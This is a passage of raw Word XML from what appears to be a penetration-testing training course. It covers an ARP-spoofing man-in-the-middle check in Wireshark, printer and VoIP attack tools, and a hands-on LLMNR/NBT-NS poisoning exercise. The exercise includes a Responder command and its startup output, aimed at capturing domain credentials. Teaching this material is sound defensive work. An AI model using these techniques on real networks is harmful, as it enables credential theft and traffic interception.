                      <a:ext cx="3559175" cy="27089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Once the ARP caches have been poisoned, one have the control over the traffic between the windows machine and the gateway. All connections are monitored:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20250768" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4799DE4C" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Let us check on Wireshark what happened when the client connects to google.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1E851" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251744256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4BCE05DE" wp14:editId="09C5ECC3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>20229</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>21590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4287520" cy="825500"/>
            <wp:effectExtent l="190500" t="190500" r="189230" b="18415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ireshark-mac-changed.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4287520" cy="825500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="70000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6A5C0A" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRPr="00AE3B9B" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The destination IP address is here 192.168.21.20 which is the windows machine while the destination MAC address is 00:50:56:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3B9B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">b5:02:f5 </w:t>
      </w:r>
      <w:r>
        <w:t>which is our kali machine. This means that the kali machine acts indeed as a man-in-the-middle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E59EC23" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Printer exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC4C1F9" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Often forgotten on a network, printers are an attack vector like any other computers. Indeed, printers are more and more connected (sometimes even to the internet…) and can be used by an attacker to gain access to the network. Printers are rarely protected and default credentials are most than common in a company.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79523D54" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>One can distinguish four types of attack against printer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6307B17B" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Denial of service (infinite loop, physical damages to NVRAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930A02A" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Protection bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D34FD" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Print job manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73669D8E" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Information disclosure (access to memory, to the file system, capture print jobs, …)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B75403" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251738112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D069D3D" wp14:editId="71CAF89C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-1270</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>554899</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4287520" cy="2357120"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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rinters_vulnerabiliti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87520" cy="2357120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>During BlackHat 2017, a presentation entitled “Exploiting Network Printers” demonstrates printer’s vulnerabilities. They have tested multiple vulnerabilities against many printers and the results speak for themselves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1EC1A6" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF7A684" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploiting printers has been easier since tools like PRET (Printer Exploitation Toolkit) have been released. This tools allow an attacker to discover printer on a network using broadcast and then to exploit multiple vulnerability on a printer. More information can be found on the GitHub repository </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007D7021">
        <w:t>github.com/RUB-NDS/PRET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).  See the printer security cheat sheet for usual checking on printer: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BBEC0B" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRPr="009362F4" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009362F4">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B56E2" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2103BB" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Because printers are forgotten and people just want them to work, their security is sometimes very weak with default credentials or a lack of NAC. This mean an attacker can get information from it and sometimes even have a LDAP user (maybe an admin) and so a network access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F98D880" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRPr="007F4AB4" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Printer can also be used to pivot on the network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B68FDA" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VoIP exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B96082" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">VoIP devices can be subject to NAC solution and if this is done using the MAC address of the VoIP phone, using the phone’s MAC address will provide an attack with an access to the network. See </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref520290008 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Basic NAC Bypass</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on page </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Ref520290008 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for more information about NAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB82B8C" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6B8F45" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Sometimes, VoIP servers can be out of date and exploit might exist. This can give an attacker the opportunity to escalate privilege on the machine hosting the VoIP server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22643C1C" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A62C354" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit has many exploit against SIP (Session Initiation Protocol), which is a communication protocol for signaling and controlling multimedia communication sessions in VoIP among others. Viproy (VoIP Pentest Toolkit) has been integrated to Metasploit and can be used to launch attack against VoIP phone. For instance, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00021D83">
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
        <w:t>sip_invite_spoof</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit can spoof a user identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EC6075" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Inviteflood, which is part of Kali Linux allow an attacker to perform a Denial Of Service against devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3D348F" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13161371" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRPr="00B569A8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If an attacker managed to intercept the VoIP traffic in a MITM attack, he can listen to VoIP exchange and even inject packet so one user will hear sound that the other cannot. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C250383" w14:textId="77777777" w:rsidR="007C4EB8" w:rsidRPr="007C4EB8" w:rsidRDefault="007C4EB8" w:rsidP="007C4EB8">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B2BF15" w14:textId="2936A0E0" w:rsidR="00660EC2" w:rsidRDefault="00660EC2" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>LLMNR and NBT-NS poisoning with responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2834CF98" w14:textId="77777777" w:rsidR="00D77495" w:rsidRDefault="00DA7070" w:rsidP="006F22D4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Link-Local Multicast Name Resolution (LLMNR) and Net</w:t>
      </w:r>
      <w:r w:rsidR="00D42C89">
        <w:t>BIOS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Name Service (NBT-NS) are two components of Windows machines that can allow an attacker to get usernames and passwords on a local network by simply waiting for a computer to give them to it.</w:t>
      </w:r>
      <w:r w:rsidR="00D77495">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2EDA78" w14:textId="5C60B577" w:rsidR="00F23DCC" w:rsidRDefault="00471E86" w:rsidP="006F22D4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50AAD35E" wp14:editId="222CACC8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-50165</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>900793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4287520" cy="2818130"/>
            <wp:effectExtent l="95250" t="114300" r="151130" b="9652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LMNR_poisoning.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4287520" cy="2818130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="70000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D77495">
        <w:t xml:space="preserve">Those two services </w:t>
      </w:r>
      <w:r w:rsidR="00036F95">
        <w:t>help computers resolving hosts</w:t>
      </w:r>
      <w:r w:rsidR="00D77495">
        <w:t xml:space="preserve"> on a local network when DNS </w:t>
      </w:r>
      <w:r w:rsidR="006873EC">
        <w:t xml:space="preserve">resolution </w:t>
      </w:r>
      <w:r w:rsidR="00036F95">
        <w:t>failed</w:t>
      </w:r>
      <w:r w:rsidR="00D77495">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00432D37">
        <w:t xml:space="preserve"> This feature</w:t>
      </w:r>
      <w:r w:rsidR="000F0ADF">
        <w:t xml:space="preserve"> seems harmless but it</w:t>
      </w:r>
      <w:r w:rsidR="001B5139">
        <w:t xml:space="preserve"> opens to a major vulnerability: an attacker can pretend being the server a host requested and answer broadcasts requests. The windows machine will then send its credentials to what it thinks is the real host is looking for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0197F6FC" w14:textId="7E213E51" w:rsidR="00DA7070" w:rsidRDefault="001B5139" w:rsidP="006F22D4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD2BB6A" w14:textId="3B24BDF8" w:rsidR="0088568D" w:rsidRDefault="0088568D" w:rsidP="0088568D">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10586783" w14:textId="1518064D" w:rsidR="0088568D" w:rsidRDefault="0088568D" w:rsidP="0088568D">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>You have been provided with a machine on the LAN network during an internal pentest. Perform a LLMNR poisoning to get a user on the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBAAD30" w14:textId="565759E2" w:rsidR="00055FD9" w:rsidRDefault="00055FD9" w:rsidP="00A77CD8">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="002C7035">
        <w:t xml:space="preserve">        DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587228D3" w14:textId="160DABEE" w:rsidR="002C7035" w:rsidRDefault="002C7035" w:rsidP="00055FD9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Start the responder on the attacker machine, listening on the right interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022BCCAD" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~# responder -I eth0 -wrv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6557AD43" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                         __</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9EC7D2" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  .----.-----.-----.-----.-----.-----.--|  |.-----.----.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3964A406" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F540D6" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  |__| |_____|_____|   __|_____|__|__|_____||_____|__|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC53699" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                   |__|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCC51CA" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286A93CB" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">           NBT-NS, LLMNR &amp; MDNS Responder 2.3.3.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB48B52" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78518195" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Author: Laurent Gaffie (laurent.gaffie@gmail.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E52531" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  To kill this script hit CRTL-C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D0B094" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F12E732" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733C434D" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Poisoners:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EECE84" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    LLMNR                      [ON]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09758D60" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    NBT-NS                     [ON]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBD532B" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    DNS/MDNS                   [ON]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632C9AC5" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413A6509" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842F291" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    HTTP server                [ON]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B609EE2" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    HTTPS server               [ON]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC27D6" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    WPAD proxy                 [ON]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0177AF" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRPr="00B616D6" w:rsidRDefault="00B70BCA" w:rsidP="00B70BCA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603C2442" w14:textId="031FEE31" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E47E42B" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="270950EA" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Generic Options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71EE43" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Responder NIC              [eth0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCE3E3B" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Responder IP               [192.168.23.200]</w:t>
      </w:r>
    </w:p>
